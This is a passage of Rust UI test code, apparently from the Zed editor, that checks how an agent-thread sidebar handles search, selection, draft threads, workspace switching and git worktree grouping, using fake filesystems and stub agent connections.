init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("t-1", "Fix crash in panel", 3), + ("t-2", "Fix lint warnings", 2), + ("t-3", "Add new feature", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project, + cx, + ) + } + cx.run_until_parked(); + + focus_sidebar(&sidebar, cx); + + // User types "fix" — two threads match. + type_in_search(&sidebar, "fix", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in panel <== selected", + " Fix lint warnings", + ] + ); + + // Selection starts on the first matching thread. User presses + // SelectNext to move to the second match. + cx.dispatch_action(SelectNext); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in panel", + " Fix lint warnings <== selected", + ] + ); + + // User can also jump back with SelectPrevious. + cx.dispatch_action(SelectPrevious); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in panel <== selected", + " Fix lint warnings", + ] + ); +} + +#[gpui::test] +async fn test_confirm_on_historical_thread_activates_workspace(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + let (workspace_0, workspace_1) = multi_workspace.read_with(cx, |mw, _| { + ( + mw.workspaces().next().unwrap().clone(), + mw.workspaces().nth(1).unwrap().clone(), + ) + }); + + save_thread_metadata( + acp::SessionId::new(Arc::from("hist-1")), + "Historical Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 6, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Historical Thread",] + ); + + // Switch to workspace 1 so we can verify the confirm switches back. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_1 + ); + + // Confirm on the historical (non-live) thread at index 1. + // Before a previous fix, the workspace field was Option and + // historical threads had None, so activate_thread early-returned + // without switching the workspace. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.selection = Some(1); + sidebar.confirm(&Confirm, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_0 + ); +} + +#[gpui::test] +async fn test_click_clears_selection_and_focus_in_restores_it(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("t-1")), + "Thread A".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + save_thread_metadata( + acp::SessionId::new(Arc::from("t-2")), + "Thread B".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + cx.run_until_parked(); + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread A", " Thread B",] + ); + + // Keyboard confirm preserves selection. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.selection = Some(1); + sidebar.confirm(&Confirm, window, cx); + }); + assert_eq!( + sidebar.read_with(cx, |sidebar, _| sidebar.selection), + Some(1) + ); + + // Click handlers clear selection to None so no highlight lingers + // after a click regardless of focus state. The hover style provides + // visual feedback during mouse interaction instead. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.selection = None; + let path_list = PathList::new(&[std::path::PathBuf::from("/my-project")]); + sidebar.toggle_collapse(&path_list, window, cx); + }); + assert_eq!(sidebar.read_with(cx, |sidebar, _| sidebar.selection), None); + + // When the user tabs back into the sidebar, focus_in no longer + // restores selection — it stays None. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.focus_in(window, cx); + }); + assert_eq!(sidebar.read_with(cx, |sidebar, _| sidebar.selection), None); +} + +#[gpui::test] +async fn test_thread_title_update_propagates_to_sidebar(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Hi there!".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + + let session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id, &project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Hello *"] + ); + + // Simulate the agent generating a title. The notification chain is: + // AcpThread::set_title emits TitleUpdated → + // ConnectionView::handle_thread_event calls cx.notify() → + // AgentPanel observer fires and emits AgentPanelEvent → + // Sidebar subscription calls update_entries / rebuild_contents. + // + // Before the fix, handle_thread_event did NOT call cx.notify() for + // TitleUpdated, so the AgentPanel observer never fired and the + // sidebar kept showing the old title. + let thread = panel.read_with(cx, |panel, cx| panel.active_agent_thread(cx).unwrap()); + thread.update(cx, |thread, cx| { + thread + .set_title("Friendly Greeting with AI".into(), cx) + .detach(); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Friendly Greeting with AI *"] + ); +} + +#[gpui::test] +async fn test_focused_thread_tracks_user_intent(cx: &mut TestAppContext) { + let project_a = init_test_project_with_agent_panel("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let (sidebar, panel_a) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Save a thread so it appears in the list. + let connection_a = StubAgentConnection::new(); + connection_a.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel_a, connection_a, cx); + send_message(&panel_a, cx); + let session_id_a = active_session_id(&panel_a, cx); + save_test_thread_metadata(&session_id_a, &project_a, cx).await; + + // Add a second workspace with its own agent panel. + let fs = cx.update(|_, cx| ::global(cx)); + fs.as_fake() + .insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + let project_b = project::Project::test(fs, ["/project-b".as_ref()], cx).await; + let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx) + }); + let panel_b = add_agent_panel(&workspace_b, cx); + cx.run_until_parked(); + + let workspace_a = + multi_workspace.read_with(cx, |mw, _cx| mw.workspaces().next().unwrap().clone()); + + // ── 1. Initial state: focused thread derived from active panel ───── + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "The active panel's thread should be focused on startup", + ); + }); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_thread( + ThreadMetadata { + session_id: session_id_a.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Test".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + archived: false, + }, + &workspace_a, + window, + cx, + ); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "After clicking a thread, it should be the focused thread", + ); + assert!( + has_thread_entry(sidebar, &session_id_a), + "The clicked thread should be present in the entries" + ); + }); + + workspace_a.read_with(cx, |workspace, cx| { + assert!( + workspace.panel::(cx).is_some(), + "Agent panel should exist" + ); + let dock = workspace.right_dock().read(cx); + assert!( + dock.is_open(), + "Clicking a thread should open the agent panel dock" + ); + }); + + let connection_b = StubAgentConnection::new(); + connection_b.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Thread B".into()), + )]); + open_thread_with_connection(&panel_b, connection_b, cx); + send_message(&panel_b, cx); + let session_id_b = active_session_id(&panel_b, cx); + save_test_thread_metadata(&session_id_b, &project_b, cx).await; + cx.run_until_parked(); + + // Workspace A is currently active. Click a thread in workspace B, + // which also triggers a workspace switch. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_thread( + ThreadMetadata { + session_id: session_id_b.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Thread B".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + archived: false, + }, + &workspace_b, + window, + cx, + ); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_b, + "Clicking a thread in another workspace should focus that thread", + ); + assert!( + has_thread_entry(sidebar, &session_id_b), + "The cross-workspace thread should be present in the entries" + ); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "Switching workspace should seed focused_thread from the new active panel", + ); + assert!( + has_thread_entry(sidebar, &session_id_a), + "The seeded thread should be present in the entries" + ); + }); + + let connection_b2 = StubAgentConnection::new(); + connection_b2.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new(DEFAULT_THREAD_TITLE.into()), + )]); + open_thread_with_connection(&panel_b, connection_b2, cx); + send_message(&panel_b, cx); + let session_id_b2 = active_session_id(&panel_b, cx); + save_test_thread_metadata(&session_id_b2, &project_b, cx).await; + cx.run_until_parked(); + + // Panel B is not the active workspace's panel (workspace A is + // active), so opening a thread there should not change focused_thread. + // This prevents running threads in background workspaces from causing + // the selection highlight to jump around. + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "Opening a thread in a non-active panel should not change focused_thread", + ); + }); + + workspace_b.update_in(cx, |workspace, window, cx| { + workspace.focus_handle(cx).focus(window, cx); + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_a, + "Defocusing the sidebar should not change focused_thread", + ); + }); + + // Switching workspaces via the multi_workspace (simulates clicking + // a workspace header) should clear focused_thread. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().find(|w| *w == &workspace_b).cloned(); + if let Some(workspace) = workspace { + mw.activate(workspace, window, cx); + } + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_b2, + "Switching workspace should seed focused_thread from the new active panel", + ); + assert!( + has_thread_entry(sidebar, &session_id_b2), + "The seeded thread should be present in the entries" + ); + }); + + // ── 8. Focusing the agent panel thread keeps focused_thread ──── + // Workspace B still has session_id_b2 loaded in the agent panel. + // Clicking into the thread (simulated by focusing its view) should + // keep focused_thread since it was already seeded on workspace switch. + panel_b.update_in(cx, |panel, window, cx| { + if let Some(thread_view) = panel.active_conversation_view() { + thread_view.read(cx).focus_handle(cx).focus(window, cx); + } + }); + cx.run_until_parked(); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_thread( + sidebar, + &session_id_b2, + "Focusing the agent panel thread should set focused_thread", + ); + assert!( + has_thread_entry(sidebar, &session_id_b2), + "The focused thread should be present in the entries" + ); + }); +} + +#[gpui::test] +async fn test_new_thread_button_works_after_adding_folder(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/project-a", cx).await; + let fs = cx.update(|cx| ::global(cx)); + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Start a thread and send a message so it has history. + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + let session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id, &project, cx).await; + cx.run_until_parked(); + + // Verify the thread appears in the sidebar. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Hello *",] + ); + + // The "New Thread" button should NOT be in "active/draft" state + // because the panel has a thread with messages. + sidebar.read_with(cx, |sidebar, _cx| { + assert!( + matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { .. })), + "Panel has a thread with messages, so active_entry should be Thread, got {:?}", + sidebar.active_entry, + ); + }); + + // Now add a second folder to the workspace, changing the path_list. + fs.as_fake() + .insert_tree("/project-b", serde_json::json!({ "src": {} })) + .await; + project + .update(cx, |project, cx| { + project.find_or_create_worktree("/project-b", true, cx) + }) + .await + .expect("should add worktree"); + cx.run_until_parked(); + + // The workspace path_list is now [project-a, project-b]. The active + // thread's metadata was re-saved with the new paths by the agent panel's + // project subscription, so it stays visible under the updated group. + // The old [project-a] group persists in the sidebar (empty) because + // project_group_keys is append-only. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project-a, project-b]", // + " Hello *", + "v [project-a]", + ] + ); + + // The "New Thread" button must still be clickable (not stuck in + // "active/draft" state). Verify that `active_thread_is_draft` is + // false — the panel still has the old thread with messages. + sidebar.read_with(cx, |sidebar, _cx| { + assert!( + matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { .. })), + "After adding a folder the panel still has a thread with messages, \ + so active_entry should be Thread, got {:?}", + sidebar.active_entry, + ); + }); + + // Actually click "New Thread" by calling create_new_thread and + // verify a new draft is created. + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.create_new_thread(&workspace, window, cx); + }); + cx.run_until_parked(); + + // After creating a new thread, the panel should now be in draft + // state (no messages on the new thread). + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &workspace, + "After creating a new thread active_entry should be Draft", + ); + }); +} + +#[gpui::test] +async fn test_cmd_n_shows_new_thread_entry(cx: &mut TestAppContext) { + // When the user presses Cmd-N (NewThread action) while viewing a + // non-empty thread, the sidebar should show the "New Thread" entry. + // This exercises the same code path as the workspace action handler + // (which bypasses the sidebar's create_new_thread method). + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Create a non-empty thread (has messages). + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + + let session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id, &project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Hello *"] + ); + + // Simulate cmd-n + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + panel.update_in(cx, |panel, window, cx| { + panel.new_thread(&NewThread, window, cx); + }); + workspace.update_in(cx, |workspace, window, cx| { + workspace.focus_panel::(window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " [~ Draft]", " Hello *"], + "After Cmd-N the sidebar should show a highlighted Draft entry" + ); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &workspace, + "active_entry should be Draft after Cmd-N", + ); + }); +} + +#[gpui::test] +async fn test_draft_with_server_session_shows_as_draft(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Create a saved thread so the workspace has history. + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + let saved_session_id = active_session_id(&panel, cx); + save_test_thread_metadata(&saved_session_id, &project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Hello *"] + ); + + // Open a new draft thread via a server connection. This gives the + // conversation a parent_id (session assigned by the server) but + // no messages have been sent, so active_thread_is_draft() is true. + let draft_connection = StubAgentConnection::new(); + open_thread_with_connection(&panel, draft_connection, cx); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " [~ Draft]", " Hello *"], + ); + + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &workspace, + "Draft with server session should be Draft, not Thread", + ); + }); +} + +#[gpui::test] +async fn test_cmd_n_shows_new_thread_entry_in_absorbed_worktree(cx: &mut TestAppContext) { + // When the active workspace is an absorbed git worktree, cmd-n + // should still show the "New Thread" entry under the main repo's + // header and highlight it as active. + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + + // Main repo with a linked worktree. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Worktree checkout pointing back to the main repo. + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + let worktree_panel = add_agent_panel(&worktree_workspace, cx); + + // Switch to the worktree workspace. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); + }); + + // Create a non-empty thread in the worktree workspace. + let connection = StubAgentConnection::new(); + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&worktree_panel, connection, cx); + send_message(&worktree_panel, cx); + + let session_id = active_session_id(&worktree_panel, cx); + save_test_thread_metadata(&session_id, &worktree_project, cx).await; + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " Hello {wt-feature-a} *"] + ); + + // Simulate Cmd-N in the worktree workspace. + worktree_panel.update_in(cx, |panel, window, cx| { + panel.new_thread(&NewThread, window, cx); + }); + worktree_workspace.update_in(cx, |workspace, window, cx| { + workspace.focus_panel::(window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " [~ Draft {wt-feature-a}]", + " Hello {wt-feature-a} *" + ], + "After Cmd-N in an absorbed worktree, the sidebar should show \ + a highlighted Draft entry under the main repo header" + ); + + sidebar.read_with(cx, |sidebar, _cx| { + assert_active_draft( + sidebar, + &worktree_workspace, + "active_entry should be Draft after Cmd-N", + ); + }); +} + +async fn init_test_project_with_git( + worktree_path: &str, + cx: &mut TestAppContext, +) -> (Entity, Arc) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + worktree_path, + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + let project = project::Project::test(fs.clone(), [worktree_path.as_ref()], cx).await; + (project, fs) +} + +#[gpui::test] +async fn test_search_matches_worktree_name(cx: &mut TestAppContext) { + let (project, fs) = init_test_project_with_git("/project", cx).await; + + fs.as_fake() + .add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt/rosewood"), + ref_name: Some("refs/heads/rosewood".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt/rosewood".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_named_thread_metadata("main-t", "Unrelated Thread", &project, cx).await; + save_named_thread_metadata("wt-t", "Fix Bug", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Search for "rosewood" — should match the worktree name, not the title. + type_in_search(&sidebar, "rosewood", cx); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " Fix Bug {rosewood} <== selected"], + ); +} + +#[gpui::test] +async fn test_git_worktree_added_live_updates_sidebar(cx: &mut TestAppContext) { + let (project, fs) = init_test_project_with_git("/project", cx).await; + + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt/rosewood".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread against a worktree path that doesn't exist yet. + save_named_thread_metadata("wt-thread", "Worktree Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Thread is not visible yet — no worktree knows about this path. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " [+ New Thread]"] + ); + + // Now add the worktree to the git state and trigger a rescan. + fs.as_fake() + .add_linked_worktree_for_repo( + Path::new("/project/.git"), + true, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt/rosewood"), + ref_name: Some("refs/heads/rosewood".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " Worktree Thread {rosewood}",] + ); +} + +#[gpui::test] +async fn test_two_worktree_workspaces_absorbed_when_main_added(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Create the main repo directory (not opened as a workspace yet). + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": { + }, + "src": {}, + }), + ) + .await; + + // Two worktree checkouts whose .git files point back to the main repo. + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-b"), + ref_name: Some("refs/heads/feature-b".into()), + sha: "bbb".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/wt-feature-b".as_ref()], cx).await; + + project_a.update(cx, |p, cx| p.git_scans_complete(cx)).await; + project_b.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + // Open both worktrees as workspaces — no main repo yet. + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx); + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_named_thread_metadata("thread-a", "Thread A", &project_a, cx).await; + save_named_thread_metadata("thread-b", "Thread B", &project_b, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Without the main repo, each worktree has its own header. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " Thread A {wt-feature-a}", + " Thread B {wt-feature-b}", + ] + ); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(main_project.clone(), window, cx); + }); + cx.run_until_parked(); + + // Both worktree workspaces should now be absorbed under the main + // repo header, with worktree chips. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " Thread A {wt-feature-a}", + " Thread B {wt-feature-b}", + ] + ); +} + +#[gpui::test] +async fn test_threadless_workspace_shows_new_thread_with_worktree_chip(cx: &mut TestAppContext) { + // When a group has two workspaces — one with threads and one + // without — the threadless workspace should appear as a + // "New Thread" button with its worktree chip. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Main repo with two linked worktrees. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-b"), + ref_name: Some("refs/heads/feature-b".into()), + sha: "bbb".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Workspace A: worktree feature-a (has threads). + let project_a = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + project_a.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + // Workspace B: worktree feature-b (no threads). + let project_b = project::Project::test(fs.clone(), ["/wt-feature-b".as_ref()], cx).await; + project_b.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx); + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Only save a thread for workspace A. + save_named_thread_metadata("thread-a", "Thread A", &project_a, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Workspace A's thread appears normally. Workspace B (threadless) + // appears as a "New Thread" button with its worktree chip. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " [+ New Thread {wt-feature-b}]", + " Thread A {wt-feature-a}", + ] + ); +} + +#[gpui::test] +async fn test_multi_worktree_thread_shows_multiple_chips(cx: &mut TestAppContext) { + // A thread created in a workspace with roots from different git + // worktrees should show a chip for each distinct worktree name. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Two main repos. + fs.insert_tree( + "/project_a", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.insert_tree( + "/project_b", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Worktree checkouts. + for repo in &["project_a", "project_b"] { + let git_path = format!("/{repo}/.git"); + for branch in &["olivetti", "selectric"] { + fs.add_linked_worktree_for_repo( + Path::new(&git_path), + false, + git::repository::Worktree { + path: std::path::PathBuf::from(format!("/worktrees/{repo}/{branch}/{repo}")), + ref_name: Some(format!("refs/heads/{branch}").into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + } + } + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Open a workspace with the worktree checkout paths as roots + // (this is the workspace the thread was created in). + let project = project::Project::test( + fs.clone(), + [ + "/worktrees/project_a/olivetti/project_a".as_ref(), + "/worktrees/project_b/selectric/project_b".as_ref(), + ], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = 